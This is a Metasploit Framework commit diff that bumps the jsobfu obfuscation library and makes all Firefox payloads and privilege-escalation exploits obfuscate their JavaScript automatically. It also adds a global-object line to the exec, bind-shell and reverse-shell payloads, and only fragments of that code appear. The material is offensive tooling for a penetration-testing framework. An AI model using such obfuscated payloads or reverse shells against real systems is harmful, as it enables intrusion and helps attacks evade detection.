Install a global object in firefox payloads, bump jsobfu.

2014-09-24 16:05:00 -05:00 · 2014-09-24 16:05:00 -05:00 · b96a7ed1d0
parent 5d234c0e01
commit b96a7ed1d0
7 changed files with 20 additions and 12 deletions
--- a/Gemfile.lock
+++ b/Gemfile.lock
@ -5,7 +5,7 @@ PATH
      actionpack (< 4.0.0)
      activesupport (>= 3.0.0, < 4.0.0)
      bcrypt
-      jsobfu (~> 0.1.7)
+      jsobfu (~> 0.2.0)
      json
      metasploit-concern (~> 0.2.1)
      metasploit-model (~> 0.27.1)
@ -91,7 +91,7 @@ GEM
    hike (1.2.3)
    i18n (0.6.11)
    journey (1.0.4)
-    jsobfu (0.1.7)
+    jsobfu (0.2.0)
      rkelly-remix (= 0.0.6)
    json (1.8.1)
    mail (2.5.4)
--- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
+++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
@ -12,6 +12,7 @@ require 'msf/core/exploit/jsobfu'
 module Msf
 module Exploit::Remote::FirefoxPrivilegeEscalation

+  # automatically obfuscate anything that runs through `js_exec`
  include Msf::Exploit::JSObfu

  # Sends the +js+ code to the remote session, which executes it in Firefox's
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@ -1,9 +1,13 @@
 # -*- coding: binary -*-
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 require 'json'

 module Msf::Payload::Firefox

+  # automatically obfuscate every Firefox payload
+  include Msf::Exploit::JSObfu
+
  # Javascript source code of setTimeout(fn, delay)
  # @return [String] javascript source code that exposes the setTimeout(fn, delay) method
  def set_timeout_source
@ -121,16 +125,15 @@ module Msf::Payload::Firefox
          var retVal = null;

          try {
-            retVal = Function(js[1]).call({
-              send: function(r){
+            this.send = function(r){
              if (sent) return;
              sent = true;
              if (r) {
                if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
                else      cb(false, r+tag+"\\n");
              }
-              }
-            });
+            };
+            retVal = Function(js[1]).call(this);
          } catch (e) { retVal = e.message; }

          sync = false;
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
  # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
  spec.add_runtime_dependency 'bcrypt'
  # Needed for Javascript obfuscation
-  spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
+  spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
  # Needed for some admin modules (scrutinizer_add_user.rb)
  spec.add_runtime_dependency 'json'
  # Metasploit::Concern hooks
--- a/modules/payloads/singles/firefox/exec.rb
+++ b/modules/payloads/singles/firefox/exec.rb
@ -34,6 +34,7 @@ module Metasploit3
    <<-EOS

      (function(){
+        window = this;
        #{read_file_source if datastore['WSCRIPT']}
        #{run_cmd_source if datastore['WSCRIPT']}

--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@ -34,6 +34,7 @@ module Metasploit3
  def generate
    %Q|
    (function(){
+      window = this;
      Components.utils.import("resource://gre/modules/NetUtil.jsm");
      var lport = #{datastore["LPORT"]};
      var rhost = "#{datastore['RHOST']}";
--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@ -32,6 +32,8 @@ module Metasploit3
    <<-EOS

      (function(){
+        window = this;
+
        Components.utils.import("resource://gre/modules/NetUtil.jsm");
        var host = '#{datastore["LHOST"]}';
        var port = #{datastore["LPORT"]};